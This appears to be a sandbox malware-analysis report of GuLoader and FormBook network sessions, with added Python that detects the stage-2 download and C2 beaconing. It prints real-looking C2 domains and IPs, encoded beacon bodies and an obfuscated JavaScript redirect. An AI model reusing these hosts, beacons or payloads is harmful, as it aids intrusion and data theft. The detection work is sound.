Data Ascii: wb{SfS0AmS_XVj\oa1M}Aq@,d>51p4k`=T206m'gy_wQaG<0-~F}L5 FU=/?Q1y<{fC0|,(YZ$"D$I@|!}+J`]z!
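Session 0 is the GuLoader stage: a 287808-byte application/octet-stream fetched from a bare IP with a Firefox User-Agent by a process running from %TEMP% (Stemmeurnes.exe), and its first bytes start with c1 da rather than any known file header, which is what an encrypted shellcode blob looks like on the wire. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code: it scores a download on exactly those traits, computing the Shannon entropy of the first 338 bytes of the body copied from the Data Raw dump above, with the 162-byte nginx 404 body from session 1 as a low-entropy control. The 6.5 bits/byte threshold and the %TEMP%-path check are assumptions of this example, not values taken from the report.

```python
import math
from dataclasses import dataclass
from ipaddress import ip_address
from typing import List, Optional

# First 338 bytes of the session 0 response body, copied from the report's
# "Data Raw" dump (the full body is Content-Length: 287808).
STAGE2_PREFIX = bytes.fromhex(
    "c1dabe2481c7dc68b2109eaba97aa9e5" "0e9446fbfb66effb5d2a1552ba0b743e"
    "2d52affc140358323ea6f39f308c9bdc" "8c64860a28617c08d34333f0298c4c31"
    "2ffe8e324605184c3e41ec08a31a4faa" "bb5cff0ac7887249492137844af87d25"
    "003ff2d930bb6e359855489558f4a1f6" "52b36aa70a1191fcfc83f1442f67f3b6"
    "5c0daa2454f08b90f97e02d05b6913d3" "057f1c2a763ca25817d51d702f35bb8c"
    "52b95f7bd84d3c28f492d7da557777ef" "55924935a3b977470a658e4b02306483"
    "97fbf3b97b0aaf6832e4ff5d6a846b87" "a16370b660eae1e16522042d3c407a78"
    "4eec70cbf237a758e8706afc27447352" "cbdaaaa46b7af7bf98ee9b1c89b42402"
    "6875e0006292a8ad1e1b86abc2ec2f83" "28166ffda7b6f65009efcb3b73e0e6bb"
    "9f13eca77d320f04292f74b2aa685dee" "683c72ea27e6298ea8eb3d751b3faeb7"
    "b31d5a233725ece86ff14434ce66e3f5" "dbc7"
)

# The 404 body returned in session 1 (copied from the report), used as the
# low-entropy control.
HTML_404 = (
    b"<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n"
    b"<center><h1>404 Not Found</h1></center>\r\n"
    b"<hr><center>nginx/1.24.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n"
)

BB10_UA = ("Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) "
           "Version/10.3.2.680 Mobile Safari/537.35+")
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"


def shannon_entropy(data: bytes) -> float:
    """Plug-in Shannon entropy in bits per byte (0..8) of the byte histogram."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


# Magic numbers a legitimate octet-stream download usually carries.
KNOWN_MAGIC = {
    b"MZ": "PE", b"\x7fELF": "ELF", b"PK\x03\x04": "ZIP/OOXML",
    b"%PDF": "PDF", b"\x1f\x8b": "gzip", b"\xd0\xcf\x11\xe0": "OLE2",
}


def file_magic(data: bytes) -> Optional[str]:
    """Name of the recognised container format, or None if the prefix matches nothing."""
    for magic, name in KNOWN_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP address instead of a DNS name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


@dataclass
class HttpDownload:
    process: str        # process path from the report's session table
    host: str           # Host request header
    user_agent: str
    content_type: str
    content_length: int
    body_prefix: bytes  # first bytes of the response body


def score_download(d: HttpDownload, entropy_threshold: float = 6.5) -> List[str]:
    """Reasons this transfer looks like a packed stage-2 fetch (empty list = nothing found).

    The plug-in entropy estimate is biased low on a few hundred bytes (about 0.5 bit
    at this sample size), so the assumed threshold is 6.5 rather than the 7.0 often
    used for whole files.
    """
    reasons = []
    if is_bare_ip(d.host):
        reasons.append("Host header is a bare IP address")
    if "\\AppData\\Local\\Temp\\" in d.process and "Mozilla/" in d.user_agent:
        reasons.append("browser User-Agent sent by a process running from %TEMP%")
    if d.content_type.startswith("application/octet-stream"):
        magic = file_magic(d.body_prefix)
        ent = shannon_entropy(d.body_prefix)
        if magic is None and ent >= entropy_threshold:
            reasons.append(f"octet-stream with no file magic and {ent:.2f} bits/byte "
                           "entropy: encrypted blob, not a plain executable")
    return reasons


# Both transfers as they appear in the report's session tables and headers.
SESSION_0 = HttpDownload(
    process=r"C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe",
    host="212.162.149.63", user_agent=FIREFOX_UA,
    content_type="application/octet-stream", content_length=287808,
    body_prefix=STAGE2_PREFIX)
SESSION_1 = HttpDownload(
    process=r"C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe",
    host="www.carhireheaven.online", user_agent=BB10_UA,
    content_type="text/html", content_length=162, body_prefix=HTML_404)

if __name__ == "__main__":
    for name, session in (("session 0", SESSION_0), ("session 1", SESSION_1)):
        print(name, score_download(session) or ["no findings"])
```

The score is deliberately additive rather than any single rule: a bare-IP host alone is common on CDNs and update servers, and high entropy alone matches every legitimate compressed archive, but an octet-stream with no recognisable magic, from a bare IP, pulled by a browser-impersonating process in %TEMP%, is the combination that a GuLoader-style first stage produces and that none of the later FormBook sessions on this page reproduce.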


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49725 | 165.22.38.185 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 10:06:45.145488977 CET | 522 | OUT | GET /rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat HTTP/1.1
Host: www.carhireheaven.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
Nov 28, 2024 10:06:46.268918991 CET | 321 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 28 Nov 2024 09:06:46 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49726 | 154.88.22.104 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 10:07:02.120712996 CET | 764 | OUT | POST /f425/ HTTP/1.1
Host: www.dy01urj.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.dy01urj.pro
Referer: http://www.dy01urj.pro/f425/
Cache-Control: no-cache
Content-Length: 211
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
Data Raw: 38 6a 54 34 6b 4c 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 69 5a 71 37 68 4a 67 52 55 6d 4b 33 66 4d 45 39 68 48 47 65 4e 69 39 39 5a 6d 35 51 73 43 4f 71 7a 42 35 41 59 51 4b 75 38 54 70 2f 4d 7a 45 50 45 4c 43 72 66 4a 34 6a 61 68 74 5a 7a 52 62 64 76 62 57 48 2b 42 52 61 71 56 35 79 5a 2f 64 67 63 7a 76 53 61 48 44 4c 76 32 41 67 2b 69 55 42 45 36 75 35 45 73 6c 4f 4f 6d 4c 71 6c 55 65 38 62 51 7a 6a 77 37 2f 44 6f 4d 52 4b 53 37 39 32 76 44 56 68 32 6b 61 75 7a 34 53 39 71 42 70 55 36 6d 42 62 36 35 7a 6f 66 7a 58 5a 73 6f 46 32 53 38 4b 4f 31 67 35 56 48 33 49 63 32 76 53 62 37 47 6f 54 4e 65 52 77 54 63 38 42 73 33 4d 56
Data Ascii: 8jT4kL=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV
Nov 28, 2024 10:07:03.718035936 CET | 364 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 09:07:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000
Content-Encoding: gzip
Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 c6 be 55 be 15 3e b9 41 a6 be 2e ae e5 c9 46 9e a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 a2 05 05 cf 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>A.F^eY!6PZ0
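The FormBook requests in sessions 1 to 3 of this report share one shape: a short single-segment directory (/rym4/, /f425/), one long opaque parameter (8jT4kL=...) either in the query string of a GET or as the body of a form-encoded POST, a BlackBerry 10 User-Agent sent from a Windows process, Connection: close, and a different domain for each attempt, while the DNS table shows a fresh name being looked up roughly every 15 seconds. The Python below is an added example, not part of the Joe Sandbox report and not FormBook's own code: it classifies requests by that shape, correlates them by (User-Agent, parameter name) across hosts so that the domain-list walking itself becomes the alert, and measures the DNS rotation cadence. The request lines and DNS timestamps are copied from the report; the two regular expressions and the two-host threshold are assumptions tuned to this sample, not a published signature.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import median
from urllib.parse import urlsplit

BB10_UA = ("Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) "
           "Version/10.3.2.680 Mobile Safari/537.35+")
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"


@dataclass
class HttpRequest:
    method: str
    target: str      # request-target exactly as on the request line
    host: str        # Host header
    user_agent: str
    body: str = ""   # form-encoded POST body, if any


# Request lines copied from sessions 0 to 3 of the report; session 0 (the
# GuLoader fetch) is included as a non-matching control.
REQUESTS = [
    HttpRequest("GET", "/kybqONxtMLpRGBHO51.bin", "212.162.149.63", FIREFOX_UA),
    HttpRequest("GET", "/rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat",
                "www.carhireheaven.online", BB10_UA),
    HttpRequest("POST", "/f425/", "www.dy01urj.pro", BB10_UA,
                body="8jT4kL=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV"),
    HttpRequest("POST", "/f425/", "www.dy01urj.pro", BB10_UA,
                body="8jT4kL=3q+B2rTmHcyTkI67tLIRSGK0TsE9vnGCNi59Zn96swaqzhpAZRKuxzp/CTEKZbDGfJkdaghZzRPdveqH/2FdrF5KVfdiBDvSaHDLvwtF+iMBYb+5HNlNHGLpyke8Kgznw7/9oNNgS9x2vClh2RmtkoS7khojqn4c252kD1/235FzaqXUpT52Vnoe2tKp7mo5PepwBLwmjDp2kC0W4OPpJs2dswp79tSzBw=="),
]

# DNS queries copied from the report (timestamps truncated to microseconds; the
# 10:08:02 retransmit of www.lucelight.info is omitted).
DNS_QUERIES = [
    ("10:06:44.401035", "www.carhireheaven.online"),
    ("10:07:01.327617", "www.dy01urj.pro"),
    ("10:07:16.781925", "www.openhorizons.pro"),
    ("10:07:31.656219", "www.topkapiescortg.xyz"),
    ("10:07:46.796545", "www.thezensive.work"),
    ("10:08:01.796549", "www.lucelight.info"),
    ("10:08:17.249871", "www.kevmedia.online"),
]

# Assumed patterns, fitted to /rym4/ and /f425/ and to the 8jT4kL values seen here.
SHORT_DIR = re.compile(r"^/[a-z0-9]{3,8}/$")
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def first_param(form: str):
    """Name and raw value of the first key=value pair (no '+' decoding, so the
    value keeps its base64 alphabet); None if there is no pair."""
    key, sep, value = form.split("&", 1)[0].partition("=")
    return (key, value) if sep else None


def classify(req: HttpRequest):
    """Beacon attributes if req has the FormBook shape described above, else None."""
    parts = urlsplit(req.target)
    if not SHORT_DIR.match(parts.path):
        return None
    kv = first_param(parts.query if req.method == "GET" else req.body)
    if kv is None or not B64ISH.match(kv[1]):
        return None
    return {"host": req.host, "path": parts.path, "param": kv[0], "value_len": len(kv[1])}


def correlate(requests, min_hosts: int = 2) -> dict:
    """Group beacon-shaped requests by (User-Agent, parameter name) and alert when
    one such pair is sent to min_hosts or more distinct hosts: the same client
    walking a C2 list, which a per-request rule cannot see."""
    groups = defaultdict(list)
    for r in requests:
        c = classify(r)
        if c:
            groups[(r.user_agent, c["param"])].append(c)
    alerts = {}
    for (ua, param), hits in groups.items():
        hosts = sorted({h["host"] for h in hits})
        if len(hosts) >= min_hosts:
            alerts[param] = {
                "hosts": hosts,
                "paths": sorted({h["path"] for h in hits}),
                "requests": len(hits),
                "ua_os_mismatch": "BB10" in ua,  # BlackBerry UA from a Windows process
            }
    return alerts


def dns_rotation(queries) -> dict:
    """Distinct names queried and the median gap in seconds between lookups."""
    times = [datetime.strptime(t, "%H:%M:%S.%f") for t, _ in queries]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return {"names": len({n for _, n in queries}), "median_gap_s": round(median(gaps), 1)}


if __name__ == "__main__":
    print(correlate(REQUESTS))
    print(dns_rotation(DNS_QUERIES))
```

On a real proxy or Zeek log the grouping key should also carry the client (source IP, or the PID that the session table gives here), otherwise two unrelated machines beaconing to one family's infrastructure are merged into a single alert; the report's data is from a single host, so the key above is enough for it.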


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649727154.88.22.104806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:04.790400028 CET788OUTPOST /f425/ HTTP/1.1
                                                                      Host: www.dy01urj.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.dy01urj.pro
                                                                      Referer: http://www.dy01urj.pro/f425/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 6b 49 36 37 74 4c 49 52 53 47 4b 30 54 73 45 39 76 6e 47 43 4e 69 35 39 5a 6e 39 36 73 77 61 71 7a 68 70 41 5a 52 4b 75 78 7a 70 2f 43 54 45 4b 5a 62 44 47 66 4a 6b 64 61 67 68 5a 7a 52 50 64 76 65 71 48 2f 32 46 64 72 46 35 4b 56 66 64 69 42 44 76 53 61 48 44 4c 76 77 74 46 2b 69 4d 42 59 62 2b 35 48 4e 6c 4e 48 47 4c 70 79 6b 65 38 4b 67 7a 6e 77 37 2f 39 6f 4e 4e 67 53 39 78 32 76 43 6c 68 32 52 6d 74 6b 6f 53 37 6b 68 6f 6a 71 6e 34 63 32 35 32 6b 44 31 2f 32 33 35 46 7a 61 71 58 55 70 54 35 32 56 6e 6f 65 32 74 4b 70 37 6d 6f 35 50 65 70 77 42 4c 77 6d 6a 44 70 32 6b 43 30 57 34 4f 50 70 4a 73 32 64 73 77 70 37 39 74 53 7a 42 77 3d 3d
                                                                      Data Ascii: 8jT4kL=3q+B2rTmHcyTkI67tLIRSGK0TsE9vnGCNi59Zn96swaqzhpAZRKuxzp/CTEKZbDGfJkdaghZzRPdveqH/2FdrF5KVfdiBDvSaHDLvwtF+iMBYb+5HNlNHGLpyke8Kgznw7/9oNNgS9x2vClh2RmtkoS7khojqn4c252kD1/235FzaqXUpT52Vnoe2tKp7mo5PepwBLwmjDp2kC0W4OPpJs2dswp79tSzBw==
                                                                      Nov 28, 2024 10:07:06.378921032 CET | 364               | IN        | HTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 c6 be 55 be 15 3e b9 41 a6 be 2e ae e5 c9 46 9e a5 c9 1e 5e 65 fe 59 e9 a6 be 21 ae b6 ea 9a 36 fa 50 13 01 a2 05 05 cf 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>A.F^eY!6PZ0


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      4          | 192.168.2.6 | 49728       | 154.88.22.104  | 80               | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp                           | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:07.447206974 CET | 1801              | OUT       | POST /f425/ HTTP/1.1
                                                                      Host: www.dy01urj.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.dy01urj.pro
                                                                      Referer: http://www.dy01urj.pro/f425/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 6b 49 36 37 74 4c 49 52 53 47 4b 30 54 73 45 39 76 6e 47 43 4e 69 35 39 5a 6e 39 36 73 77 43 71 7a 79 52 41 59 79 69 75 77 7a 70 2f 4b 7a 45 4c 5a 62 44 2b 66 4a 38 6e 61 67 39 6a 7a 54 33 64 75 38 53 48 32 6e 46 64 6c 46 35 4b 49 50 64 6e 63 7a 75 49 61 48 53 4d 76 32 4e 46 2b 69 4d 42 59 59 57 35 52 73 6c 4e 42 47 4c 71 6c 55 65 4f 62 51 79 41 77 37 6d 47 6f 4e 35 61 53 4e 52 32 73 69 31 68 30 44 4f 74 6e 49 53 35 6a 68 6f 37 71 6d 45 54 32 35 36 53 44 78 2f 59 33 37 5a 7a 61 76 36 44 38 33 4a 50 4b 46 42 39 6a 50 4f 2f 6c 67 6b 48 46 2b 6f 4e 42 39 74 51 6c 52 6b 56 36 6c 51 42 2b 4f 4b 61 44 66 6d 2f 6f 46 6f 75 32 63 76 61 63 4d 73 70 35 45 49 41 74 51 56 70 69 4a 48 6c 35 41 31 35 71 39 56 75 45 52 4a 34 69 56 4a 78 59 46 65 48 52 49 34 71 56 78 52 6e 7a 55 45 71 67 59 58 75 4a 61 66 32 6e 2f 52 41 30 4f 30 2f 79 37 65 45 4e 73 58 44 78 31 71 57 48 32 65 32 47 6c 4b 30 66 6d 31 70 6b 48 70 47 4f 62 49 6c 61 33 31 2f 44 6c 66 54 54 52 36 [TRUNCATED]
                                                                      Data Ascii: 8jT4kL= [TRUNCATED]


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      5          | 192.168.2.6 | 49729       | 154.88.22.104  | 80               | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp                           | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:10.161540985 CET | 513               | OUT       | GET /f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.dy01urj.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:11.716651917 CET | 327               | IN        | HTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Data Raw: 35 61 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 33 4d 7a 4d 78 4c 6d 52 35 4d 44 45 77 63 32 49 75 63 48 4a 76 4f 6a 67 35 4d 54 45 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 5a<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly83MzMxLmR5MDEwc2IucHJvOjg5MTE=')</script>0


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      6          | 192.168.2.6 | 49730       | 69.57.163.64   | 80               | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp                           | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:07:17.337074995 CET | 779               | OUT       | POST /ir2n/ HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.openhorizons.pro
                                                                      Referer: http://www.openhorizons.pro/ir2n/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 71 32 50 51 2f 4c 7a 54 4c 70 76 31 52 49 58 37 55 77 57 34 75 5a 47 44 34 4c 46 4e 46 37 49 6a 36 39 4e 2f 75 6c 68 51 74 47 72 64 65 67 4d 66 6a 58 48 44 6d 33 4c 6e 44 6f 45 4e 46 4f 66 6d 6b 4a 69 73 46 71 2f 5a 42 67 53 79 6d 58 68 53 4d 62 4f 2f 32 73 4c 49 46 4c 5a 57 46 39 34 7a 30 72 56 72 47 70 55 6f 76 51 70 69 72 79 69 50 62 65 33 36 56 46 46 76 6b 44 31 6b 77 55 53 4d 67 50 62 69 47 51 47 4d 75 71 4e 75 74 64 76 45 57 52 65 39 36 44 4e 4b 31 52 69 43 6d 4a 48 76 2f 6b 41 54 6c 33 79 4b 59 66 46 6c 5a 70 4b 62 33 48 57 7a 39 71 4e 44 34 35 47 49 79 5a 44 4e 5a 33 63 67 78 52 6d 70 30 2f 44 72
                                                                      Data Ascii: 8jT4kL=q2PQ/LzTLpv1RIX7UwW4uZGD4LFNF7Ij69N/ulhQtGrdegMfjXHDm3LnDoENFOfmkJisFq/ZBgSymXhSMbO/2sLIFLZWF94z0rVrGpUovQpiryiPbe36VFFvkD1kwUSMgPbiGQGMuqNutdvEWRe96DNK1RiCmJHv/kATl3yKYfFlZpKb3HWz9qND45GIyZDNZ3cgxRmp0/Dr
                                                                      Nov 28, 2024 10:07:18.631484032 CET | 533               | IN        | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:18 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
